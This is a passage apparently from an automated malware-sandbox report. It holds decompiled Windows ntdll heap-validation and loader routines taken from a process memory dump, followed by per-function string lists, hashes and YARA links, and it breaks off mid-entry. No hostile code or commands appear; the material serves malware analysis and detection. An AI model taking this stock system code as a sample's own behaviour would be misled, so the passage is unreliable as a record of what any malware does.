						if(E01669660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E0165174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E0162B150();
										} else {
											E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_t148 = _t330 + 0x10; // 0x10
										_push( *((intOrPtr*)(_t330 + 8)));
										E0162B150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E0162B150();
									} else {
										E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E0162B150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E0162B150();
								} else {
									E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E0162B150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E0162B150();
							} else {
								E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E016E4AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E016DFA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E016D23E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}



























































                      0x016e44a1
                      0x016e44a3
                      0x016e44a7
                      0x016e44ac
                      0x016e44af
                      0x016e44b2
                      0x016e44b9
                      0x016e44bc
                      0x016e47f2
                      0x016e47f2
                      0x016e47f8
                      0x016e47fc
                      0x016e47fe
                      0x016e4804
                      0x016e4805
                      0x016e4805
                      0x016e480c
                      0x016e4810
                      0x016e4812
                      0x016e4812
                      0x016e4812
                      0x016e4822
                      0x016e4822
                      0x016e4827
                      0x016e4827
                      0x00000000
                      0x016e4827
                      0x016e44c4
                      0x016e44d3
                      0x016e44d9
                      0x016e44dc
                      0x016e44de
                      0x016e44e0
                      0x016e4560
                      0x016e4520
                      0x016e4522
                      0x016e4525
                      0x016e4528
                      0x016e452b
                      0x016e452e
                      0x016e4530
                      0x016e4697
                      0x016e469d
                      0x016e46a1
                      0x016e46c0
                      0x016e46c5
                      0x016e46a3
                      0x016e46b8
                      0x016e46bd
                      0x016e46cb
                      0x016e46d4
                      0x016e4677
                      0x016e4677
                      0x016e4679
                      0x016e467c
                      0x016e468a
                      0x016e4690
                      0x016e4690
                      0x016e47f1
                      0x016e47f1
                      0x016e47f1
                      0x00000000
                      0x016e47f1
                      0x016e4536
                      0x016e4539
                      0x016e453c
                      0x016e4636
                      0x016e463c
                      0x016e4640
                      0x016e465f
                      0x016e4664
                      0x016e4642
                      0x016e4657
                      0x016e465c
                      0x016e4670
                      0x00000000
                      0x016e4542
                      0x016e4542
                      0x016e4546
                      0x016e4548
                      0x016e454b
                      0x016e4555
                      0x016e455b
                      0x016e455b
                      0x016e455b
                      0x016e455d
                      0x016e455d
                      0x016e455d
                      0x00000000
                      0x016e455d
                      0x016e453c
                      0x016e4579
                      0x016e457c
                      0x016e4587
                      0x016e4589
                      0x016e4591
                      0x016e4592
                      0x016e4597
                      0x016e4598
                      0x016e45a1
                      0x016e45ab
                      0x016e45ab
                      0x016e45a1
                      0x016e45ae
                      0x016e45b4
                      0x016e45b9
                      0x016e45bd
                      0x016e4759
                      0x016e4759
                      0x016e475f
                      0x016e4761
                      0x016e4763
                      0x016e4765
                      0x016e4768
                      0x016e476b
                      0x016e476d
                      0x016e479c
                      0x016e479c
                      0x016e479f
                      0x016e47a2
                      0x016e47a4
                      0x016e4830
                      0x016e4833
                      0x016e4879
                      0x016e487d
                      0x016e48f1
                      0x016e48f3
                      0x016e48f3
                      0x00000000
                      0x016e48f3
                      0x016e487f
                      0x016e4885
                      0x016e4887
                      0x016e48a8
                      0x016e48a8
                      0x016e48ae
                      0x016e48b0
                      0x016e48dc
                      0x016e48dc
                      0x016e48dc
                      0x016e48dc
                      0x016e48ec
                      0x00000000
                      0x016e48ec
                      0x016e48b2
                      0x016e48bc
                      0x016e48be
                      0x016e48c1
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x016e48c3
                      0x016e48c3
                      0x016e48c6
                      0x016e48c9
                      0x016e48cc
                      0x016e48d1
                      0x016e48d4
                      0x00000000
                      0x00000000
                      0x016e48d6
                      0x016e48d7
                      0x016e48da
                      0x00000000
                      0x00000000
                      0x00000000
                      0x016e48da
                      0x016e494f
                      0x016e4955
                      0x016e4959
                      0x016e4978
                      0x016e497d
                      0x016e495b
                      0x016e4970
                      0x016e4975
                      0x016e4986
                      0x016e4987
                      0x016e498a
                      0x016e498d
                      0x016e4997
                      0x016e47ef
                      0x016e47ef
                      0x016e47ef
                      0x00000000
                      0x016e47ef
                      0x016e4890
                      0x016e4890
                      0x016e4891
                      0x016e4891
                      0x016e4894
                      0x016e4897
                      0x016e489d
                      0x016e48a0
                      0x00000000
                      0x00000000
                      0x016e48a2
                      0x016e48a3
                      0x016e48a6
                      0x00000000
                      0x00000000
                      0x00000000
                      0x016e48a6
                      0x016e48fb
                      0x016e4901
                      0x016e4905
                      0x016e4924
                      0x016e4929
                      0x016e4907
                      0x016e491c
                      0x016e4921
                      0x016e492f
                      0x016e4935
                      0x016e4936
                      0x016e4939
                      0x016e4942
                      0x00000000
                      0x016e4947
                      0x016e4835
                      0x016e483b
                      0x016e483f
                      0x016e485e
                      0x016e4863
                      0x016e4841
                      0x016e4856
                      0x016e485b
                      0x016e4869
                      0x016e486c
                      0x016e486f
                      0x016e47e7
                      0x016e47e7
                      0x00000000
                      0x016e47ec
                      0x016e47aa
                      0x016e47b0
                      0x016e47b4
                      0x016e47d3
                      0x016e47d8
                      0x016e47b6
                      0x016e47cb
                      0x016e47d0
                      0x016e47de
                      0x016e47df
                      0x016e47e2
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x016e476f
                      0x016e476f
                      0x016e4778
                      0x016e4785
                      0x016e4787
                      0x016e478c
                      0x016e478e
                      0x00000000
                      0x00000000
                      0x016e4790
                      0x016e4792
                      0x016e4794
                      0x00000000
                      0x00000000
                      0x016e4796
                      0x016e4799
                      0x00000000
                      0x016e4799
                      0x00000000
                      0x016e45c3
                      0x016e45c3
                      0x016e45c7
                      0x016e45c7
                      0x016e45ca
                      0x016e45cf
                      0x016e45d3
                      0x016e45df
                      0x016e45e4
                      0x016e45e6
                      0x016e45e8
                      0x016e45ed
                      0x016e45ed
                      0x016e45f2
                      0x016e45f2
                      0x016e45f7
                      0x016e45fc
                      0x016e4602
                      0x016e4606
                      0x016e4609
                      0x016e460f
                      0x016e46de
                      0x016e46e3
                      0x016e46e5
                      0x016e46ec
                      0x016e46ee
                      0x016e46f6
                      0x016e46f6
                      0x016e46f6
                      0x016e46f6
                      0x016e46ec
                      0x016e4615
                      0x016e4615
                      0x016e461d
                      0x016e462e
                      0x016e462e
                      0x016e461d
                      0x016e460f
                      0x016e4609
                      0x016e46fd
                      0x00000000
                      0x00000000
                      0x016e4710
                      0x016e471a
                      0x016e4720
                      0x016e4720
                      0x016e4722
                      0x016e472c
                      0x00000000
                      0x016e472e
                      0x016e472e
                      0x00000000
                      0x016e472e
                      0x016e472c
                      0x016e4738
                      0x016e473c
                      0x016e474b
                      0x016e4751
                      0x016e4751
                      0x00000000
                      0x016e473c
                      0x016e48f4
                      0x016e48f4
                      0x00000000
                      0x016e48f4

                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                      • API String ID: 0-1357697941
                      • Opcode ID: e62e5642ffebf3f968ba5d42f74f1b06d3c02b54ea84a095697e351bf55c4522
                      • Instruction ID: c354e8cf366179c4ed64f68c740f97c33cbeb53464c89a0f30de9b13ac8f0e82
                      • Opcode Fuzzy Hash: e62e5642ffebf3f968ba5d42f74f1b06d3c02b54ea84a095697e351bf55c4522
                      • Instruction Fuzzy Hash: 40F10E31602656DFDB25CFA9C888BAABBF2FF05300F198259E546D7641CB30A985CB54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0164A309, Relevance: 8.2, Strings: 6, Instructions: 687COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                      • API String ID: 0-523794902
                      • Opcode ID: 6f555d18efe0a183ac37ce3301aa3c25c08c97ed996920cb854049b613eb3950
                      • Instruction ID: a58218d68883bb604f2bbf9ab8a1bdff1839293b13ab0011d1eb6539b736bb00
                      • Opcode Fuzzy Hash: 6f555d18efe0a183ac37ce3301aa3c25c08c97ed996920cb854049b613eb3950
                      • Instruction Fuzzy Hash: 74421031244742AFDB15CF68CC94B2ABBEAFF84214F14896DE586CB352D734D981CB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016E2D82, Relevance: 7.7, Strings: 6, Instructions: 228COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                      • API String ID: 0-1745908468
                      • Opcode ID: 8b5542c3e36e2f6cf28d481346079a72588a7f2152a66c4f39843187869ea29d
                      • Instruction ID: 5e4a8988300ccab08feed0086c2caef76e05b8b24dd72e6c60a84f629369f680
                      • Opcode Fuzzy Hash: 8b5542c3e36e2f6cf28d481346079a72588a7f2152a66c4f39843187869ea29d
                      • Instruction Fuzzy Hash: 5E911F31602641DFDB26DFA8CC58AADBFF2FF49610F18815CE5465B391C7329882CB08
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01633D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                      Download Yara Rule
                      Strings
                      • Kernel-MUI-Language-SKU, xrefs: 01633F70
                      • WindowsExcludedProcs, xrefs: 01633D6F
                      • Kernel-MUI-Language-Allowed, xrefs: 01633DC0
                      • Kernel-MUI-Number-Allowed, xrefs: 01633D8C
                      • Kernel-MUI-Language-Disallowed, xrefs: 01633E97
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                      • API String ID: 0-258546922
                      • Opcode ID: 6725f12d423d8326447c862f200f8d537a7c31247b54521cad2ed9c7c0061660
                      • Instruction ID: 84063ce7a656c5c34615c87a0e3f82173667e252c1451ddaf401c219e724ee58
                      • Opcode Fuzzy Hash: 6725f12d423d8326447c862f200f8d537a7c31247b54521cad2ed9c7c0061660
                      • Instruction Fuzzy Hash: EBF13A72D00619EBCB16DF98CD80AEEBBBEFF58650F14416AE505A7350DB349E01CBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016240E1, Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                      • API String ID: 0-188067316
                      • Opcode ID: 4c159c11eb69f13a9dc181f861bd957682f1910306bccf1b92bddb0a063ca1e8
                      • Instruction ID: f1d267a009c9c3ff19f9290a593ceee4999fb9d7bc8278f5f3e1f401d788f02e
                      • Opcode Fuzzy Hash: 4c159c11eb69f13a9dc181f861bd957682f1910306bccf1b92bddb0a063ca1e8
                      • Instruction Fuzzy Hash: D7014C32142A51EED32AA76DEC0DF537BA4DB01B31F29842DF00547781CBE49494C728
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0164A830, Relevance: 5.4, Strings: 4, Instructions: 350COMMON
                      Download Yara Rule
                      Strings
                      • HEAP: , xrefs: 016922E6, 016923F6
                      • HEAP[%wZ]: , xrefs: 016922D7, 016923E7
                      • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01692403
                      • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 016922F3
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                      • API String ID: 0-1657114761
                      • Opcode ID: 797aeedcdbbd17f30b254386bf4459370ec0da079ccdcceaba0ea770fbd39c76
                      • Instruction ID: 6cbbb5fd96b32e3e380146cec5e72e02796218d1aeac8ab3811fe86483317cba
                      • Opcode Fuzzy Hash: 797aeedcdbbd17f30b254386bf4459370ec0da079ccdcceaba0ea770fbd39c76
                      • Instruction Fuzzy Hash: 03D1C274640645AFEB19CFA8C990BBABBF6FF48300F15856DD9579B342E330A981CB50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0164A229, Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: InitializeThunk
                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                      • API String ID: 2994545307-2586055223
                      • Opcode ID: e1b45d452ac4524cc7bdeba4f56cc2f7012735850a25deed1f38ea4fa1280f60
                      • Instruction ID: d1e5a9e87a6a3a289513d56bc0cdc551f2bb00536d3e1391c7e4b603667a2cf7
                      • Opcode Fuzzy Hash: e1b45d452ac4524cc7bdeba4f56cc2f7012735850a25deed1f38ea4fa1280f60
                      • Instruction Fuzzy Hash: EB510532245682AFE712DBA8CC48F677BE9EF85760F180868F952CB391D734D805CB65
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01658E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                      Download Yara Rule
                      Strings
                      • minkernel\ntdll\ldrsnap.c, xrefs: 0169933B, 01699367
                      • LdrpFindDllActivationContext, xrefs: 01699331, 0169935D
                      • Querying the active activation context failed with status 0x%08lx, xrefs: 01699357
                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0169932A
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                      • API String ID: 0-3779518884
                      • Opcode ID: def2b98634658c98af58b39d9f5d21dbe265d9de407243c21a7bab3c2e3caa35
                      • Instruction ID: 9e6c8140a968b58666795a693f75d30df32a553a6cbb64c0b3c5846437c2d1b4
                      • Opcode Fuzzy Hash: def2b98634658c98af58b39d9f5d21dbe265d9de407243c21a7bab3c2e3caa35
                      • Instruction Fuzzy Hash: C0417D31A003119FEFB6AB0FCC49A3677BDBB40318F06856DDD4497A92E7B05C819781
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016E49A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: InitializeThunk
                      • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                      • API String ID: 2994545307-336120773
                      • Opcode ID: c8baa1472cba264fee9725e2df9140826eb689fc66ddc401cde81c47dc783aff
                      • Instruction ID: 18e30b1244c23a92d2623dd536444d3fa822626a83eadb139402a13f8910175b
                      • Opcode Fuzzy Hash: c8baa1472cba264fee9725e2df9140826eb689fc66ddc401cde81c47dc783aff
                      • Instruction Fuzzy Hash: 4B31E031202514AFD322DBADCC8DF6777E9EB04631F254259F906DB285DA70E884CB69
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016499BF, Relevance: 4.3, Strings: 3, Instructions: 572COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                      • API String ID: 0-3178619729
                      • Opcode ID: 1befcb687715da1fee43f63a51106db8a63a7022c7e3cbac19d260acb69e26c6
                      • Instruction ID: 424ce0efc8fce39af467f509e2dfc6a38ca5b1867c4f6cf4a4ac87e81f2a50c9
                      • Opcode Fuzzy Hash: 1befcb687715da1fee43f63a51106db8a63a7022c7e3cbac19d260acb69e26c6
                      • Instruction Fuzzy Hash: 3322F3706002469FEB25CF6DCC94B7ABBB9EF46714F28856DE8468B382D731D881CB50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01638794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                      Download Yara Rule
                      Strings
                      • minkernel\ntdll\ldrsnap.c, xrefs: 01689C28
                      • LdrpDoPostSnapWork, xrefs: 01689C1E
                      • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01689C18
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: InitializeThunk
                      • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                      • API String ID: 2994545307-1948996284
                      • Opcode ID: 2cf09ecb39b1beda4ec25a1004a501f1d63ad770d5f1e77840f00eacaa747797
                      • Instruction ID: 542b62845ac682c51002d892b4db49df887dba626b8e675b289206334d860df1
                      • Opcode Fuzzy Hash: 2cf09ecb39b1beda4ec25a1004a501f1d63ad770d5f1e77840f00eacaa747797
                      • Instruction Fuzzy Hash: 3491E171A002169FEB29DF5DDC81ABAB7BAFFC4314B55426DE905AB241D730AE01CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0165AC7B, Relevance: 4.0, Strings: 3, Instructions: 205COMMON
                      Download Yara Rule
                      Strings
                      • HEAP: , xrefs: 0169A0BA
                      • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0169A0CD
                      • HEAP[%wZ]: , xrefs: 0169A0AD
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                      • API String ID: 0-1340214556
                      • Opcode ID: 2eb92c21509241971cb10ff2461554eda5951bc65eaca046404442444dcbe535
                      • Instruction ID: 902e2d581f73721d2451329116085639bfbee978e78a3118188295a23d8caecc
                      • Opcode Fuzzy Hash: 2eb92c21509241971cb10ff2461554eda5951bc65eaca046404442444dcbe535
                      • Instruction Fuzzy Hash: 50810632204684EFEB26DBACCD94BA9BBF8FF05314F1442A9E95187392D774E940CB10
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0164B73D, Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                      • API String ID: 0-1334570610
                      • Opcode ID: 4b23acfb07c71fbb062acfcf08f00f37bd6c8c445bd5fd5134397a2cee57466b
                      • Instruction ID: 6042d5601a79bb971b9eff710753697e2ada9c3e60dfea9785d8f0e11434b3a5
                      • Opcode Fuzzy Hash: 4b23acfb07c71fbb062acfcf08f00f37bd6c8c445bd5fd5134397a2cee57466b
                      • Instruction Fuzzy Hash: E661B270600241DFEB29DF28CC85B6ABBE6FF44314F19856DE8498B346D770E892CB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 01637E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                      Download Yara Rule
                      Strings
                      • Could not validate the crypto signature for DLL %wZ, xrefs: 01689891
                      • minkernel\ntdll\ldrmap.c, xrefs: 016898A2
                      • LdrpCompleteMapModule, xrefs: 01689898
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                      • API String ID: 0-1676968949
                      • Opcode ID: 90c536bfc4825e2e4964e89f0c7a41fc099487e8df42b888999c078a08a8c0ee
                      • Instruction ID: 7b99ad89cdb24a8f306c764da529a9a409f493f13342ee7a4a52c6fb8a39bb84
                      • Opcode Fuzzy Hash: 90c536bfc4825e2e4964e89f0c7a41fc099487e8df42b888999c078a08a8c0ee
                      • Instruction Fuzzy Hash: 185102B2A04746DBEB26DB6CCD44B2A7BE5FB80314F040AA9E9519B7D1D730ED01CB61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 016D23E3, Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                      Download Yara Rule
                      Strings
                      • HEAP: , xrefs: 016D255C
                      • HEAP[%wZ]: , xrefs: 016D254F
                      • Heap block at %p modified at %p past requested size of %Ix, xrefs: 016D256F
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                      • API String ID: 0-3815128232
                      • Opcode ID: dfbfbc1ac80459bb9f092a2cba36dfaf4ef255307949cba428a9fe2f65f6c8b9
                      • Instruction ID: ebec3ea87910d809e6f3bcdc52a1e6736063465e59eb73d53716fb7e1b85440b
                      • Opcode Fuzzy Hash: dfbfbc1ac80459bb9f092a2cba36dfaf4ef255307949cba428a9fe2f65f6c8b9
                      • Instruction Fuzzy Hash: 0C5103349012608AE375CF2ECC68B727BF1EB48645F55889DECC28B285D776D887DB60
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0162E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                      Download Yara Rule
                      Strings
                      • InstallLanguageFallback, xrefs: 0162E6DB
                      • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0162E68C
                      • @, xrefs: 0162E6C0
                      Memory Dump Source
